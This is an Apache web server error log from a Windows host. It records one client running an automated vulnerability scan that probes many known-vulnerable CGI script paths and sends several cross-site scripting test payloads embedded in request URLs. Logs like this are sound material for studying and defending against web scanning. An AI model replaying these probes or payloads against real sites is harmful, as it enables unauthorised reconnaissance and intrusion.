[Wed Sep 29 21:33:56.731355 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/YaBB
[Wed Sep 29 21:33:56.840555 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/vq
[Wed Sep 29 21:33:56.965356 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/viewcvs.cgi
[Wed Sep 29 21:33:57.074556 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/viewcvs.cgi
[Wed Sep 29 21:33:57.199356 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/urlcount.cgi
[Wed Sep 29 21:33:57.308556 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi.exe
[Wed Sep 29 21:33:57.417756 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/start.cgi
[Wed Sep 29 21:33:57.526956 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/search.pl
[Wed Sep 29 21:33:57.651757 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/search.php
[Wed Sep 29 21:33:57.760957 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/pbcgi.cgi
[Wed Sep 29 21:33:57.870157 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/pbcgi.cgi
[Wed Sep 29 21:33:57.979357 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/myguestbook.cgi
[Wed Sep 29 21:33:58.104158 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/login.pl
[Wed Sep 29 21:33:58.213358 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/htsearch.cgi
[Wed Sep 29 21:33:58.338158 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/FormMail.cgi
[Wed Sep 29 21:33:58.447358 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/fom
[Wed Sep 29 21:33:58.572158 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/fom.cgi
[Wed Sep 29 21:33:58.681359 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/erba
[Wed Sep 29 21:33:58.790559 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/diagnose.cgi
[Wed Sep 29 21:33:58.915359 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/dansguardian.pl
[Wed Sep 29 21:33:59.024559 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/cgicso
[Wed Sep 29 21:33:59.149359 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/betsie
[Wed Sep 29 21:33:59.274160 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/auction
[Wed Sep 29 21:33:59.383360 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/athcgi.exe
[Wed Sep 29 21:33:59.492560 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/.cobalt
[Wed Sep 29 21:33:59.632960 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/.cobalt
[Wed Sep 29 21:34:01.910564 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/htdocs/ss000007.pl
[Wed Sep 29 21:34:03.330167 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/htdocs/search.asp
[Wed Sep 29 21:34:03.470567 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35028] AH00127: Cannot map GET /script>alert('Vulnerable')</script>.cfm HTTP/1.1 to file
[Wed Sep 29 21:34:04.156968 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/htdocs/pm_buddy_list.asp
[Wed Sep 29 21:34:10.724580 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/htdocs/members.asp
[Wed Sep 29 21:34:11.395381 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/htdocs/launch.asp
[Wed Sep 29 21:34:13.813385 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35030] script not found or unable to stat: E:/nuevo/htdocs/forum_members.asp
[Wed Sep 29 21:34:16.590190 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35032] script not found or unable to stat: E:/nuevo/cgi-bin/test2.pl
[Wed Sep 29 21:34:16.714990 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35032] script not found or unable to stat: E:/nuevo/cgi-bin/.cobalt
[Wed Sep 29 21:34:17.026991 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35032] script not found or unable to stat: E:/nuevo/htdocs/ca000007.pl
[Wed Sep 29 21:34:17.136191 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35032] script not found or unable to stat: E:/nuevo/htdocs/ca000001.pl
[Wed Sep 29 21:34:17.260991 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35032] AH00127: Cannot map GET /bb000001.pl<script>alert('Vulnerable')</script> HTTP/1.1 to file
[Wed Sep 29 21:34:18.789794 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /<script>alert('Vulnerable')</script>.thtml HTTP/1.1 to file
[Wed Sep 29 21:34:18.898994 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /<script>alert('Vulnerable')</script>.shtml HTTP/1.1 to file
[Wed Sep 29 21:34:19.023794 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /<script>alert('Vulnerable')</script>.jsp HTTP/1.1 to file
[Wed Sep 29 21:34:19.132994 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /<script>alert('Vulnerable')</script>.aspx HTTP/1.1 to file
[Wed Sep 29 21:34:19.585395 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html HTTP/1.1 to file
[Wed Sep 29 21:34:19.694595 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1 to file
[Wed Sep 29 21:34:19.803796 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1 to file
[Wed Sep 29 21:34:19.912996 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /%22%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1 to file
[Wed Sep 29 21:34:20.053396 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35036] AH00127: Cannot map GET /%0a%0a<script>alert(\\"Vulnerable\\")</script>.jsp HTTP/1.1 to file
[Wed Sep 29 21:34:20.162596 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/title.cgi
[Wed Sep 29 21:34:20.318597 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/compatible.cgi
[Wed Sep 29 21:34:20.599397 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/probecontrol.cgi
[Wed Sep 29 21:34:20.708597 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/probecontrol.cgi
[Wed Sep 29 21:34:20.895798 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/retrieve_password.pl
[Wed Sep 29 21:34:21.004998 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/wwwadmin.pl
[Wed Sep 29 21:34:21.488599 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/bigconf.cgi
[Wed Sep 29 21:34:21.597799 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/webmap.cgi
[Wed Sep 29 21:34:21.769399 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/wwwwais
[Wed Sep 29 21:34:23.563402 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/admin
[Wed Sep 29 21:34:23.688202 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/admin
[Wed Sep 29 21:34:23.797403 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/mt-static
[Wed Sep 29 21:34:23.906603 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/mt-static
[Wed Sep 29 21:34:24.015803 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Wed Sep 29 21:34:24.125003 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Wed Sep 29 21:34:24.577404 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:24.717804 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:24.827004 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:24.936205 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.045405 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.154605 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.263805 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.388605 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.497806 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.622606 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.731806 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.856606 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:25.965806 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.075007 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.184207 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.293407 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.402607 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.527407 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.652208 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.761408 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.870608 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:26.979808 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.089008 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.198209 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.307409 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.416609 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.525809 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.666209 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.775410 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:27.900210 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.009410 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.118610 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.227810 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.337011 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.446211 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.555411 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.680211 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.789411 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:28.898612 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.007812 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.117012 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.210612 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.335412 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.444613 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.553813 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.678613 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.787813 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:29.897013 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:30.006214 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/dbman
[Wed Sep 29 21:34:30.177814 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/dcshop
[Wed Sep 29 21:34:30.287014 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/DCShop
[Wed Sep 29 21:34:30.396214 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/dcshop
[Wed Sep 29 21:34:30.521014 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/DCShop
[Wed Sep 29 21:34:30.645815 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/dumpenv.pl
[Wed Sep 29 21:34:30.770615 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/htsearch
[Wed Sep 29 21:34:30.895415 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/mkilog.exe
[Wed Sep 29 21:34:31.004615 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/mkplog.exe
[Wed Sep 29 21:34:31.113815 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/orders
[Wed Sep 29 21:34:31.223016 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/processit.pl
[Wed Sep 29 21:34:31.332216 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/rpm_query
[Wed Sep 29 21:34:31.441416 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/sawmill
[Wed Sep 29 21:34:31.566216 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/shop
[Wed Sep 29 21:34:31.675416 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/shop
[Wed Sep 29 21:34:31.784617 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/ws_ftp.ini
[Wed Sep 29 21:34:31.893817 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/WS_FTP.ini
[Wed Sep 29 21:34:32.783018 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] script not found or unable to stat: E:/nuevo/cgi-bin/MachineInfo
[Wed Sep 29 21:34:34.904622 2021] [proxy:error] [pid 10816:tid 20872] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:34:34.904622 2021] [proxy_ajp:error] [pid 10816:tid 20872] [client 65.94.34.16:35036] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:34:35.357023 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/view-source
[Wed Sep 29 21:34:35.466223 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/webplus
[Wed Sep 29 21:34:35.809424 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/ibill.pm
[Wed Sep 29 21:34:35.918624 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/scoadminreg.cgi
[Wed Sep 29 21:34:36.027824 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/SGB_DIR
[Wed Sep 29 21:34:36.480225 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/icat
[Wed Sep 29 21:34:36.589425 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/MsmMask.exe
[Wed Sep 29 21:34:36.698625 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/MsmMask.exe
[Wed Sep 29 21:34:36.807825 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/MsmMask.exe
[Wed Sep 29 21:34:36.917026 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/MsmMask.exe
[Wed Sep 29 21:34:37.026226 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/MsmMask.exe
[Wed Sep 29 21:34:37.135426 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/nph-showlogs.pl
[Wed Sep 29 21:34:37.275826 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/query
[Wed Sep 29 21:34:37.385027 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi
[Wed Sep 29 21:34:37.494227 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/update.dpgs
[Wed Sep 29 21:34:37.603427 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/view-source
[Wed Sep 29 21:34:37.712627 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/wrap
[Wed Sep 29 21:34:37.931027 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/FormHandler.cgi
[Wed Sep 29 21:34:38.055828 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/FormHandler.cgi
[Wed Sep 29 21:34:38.165028 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/lastlines.cgi
[Wed Sep 29 21:34:38.305428 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/calendar_admin.pl
[Wed Sep 29 21:34:38.414628 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/calendar
[Wed Sep 29 21:34:38.523829 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/campas
[Wed Sep 29 21:34:38.633029 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/cgicso
[Wed Sep 29 21:34:38.757829 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:34:38.867029 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Wed Sep 29 21:34:38.976229 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/Count.cgi
[Wed Sep 29 21:34:39.085429 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/csChatRBox.cgi
[Wed Sep 29 21:34:39.194630 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/csGuestBook.cgi
[Wed Sep 29 21:34:39.335030 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/csLiveSupport.cgi
[Wed Sep 29 21:34:39.459830 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/csNewsPro.cgi
[Wed Sep 29 21:34:39.569030 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/echo.bat
[Wed Sep 29 21:34:39.693831 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/ImageFolio
[Wed Sep 29 21:34:39.803031 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35038] script not found or unable to stat: E:/nuevo/cgi-bin/info2www
[Wed Sep 29 21:34:40.021431 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/info2www
[Wed Sep 29 21:34:40.161831 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35040] script not found or unable to stat: E:/nuevo/cgi-bin/infosrch.cgi
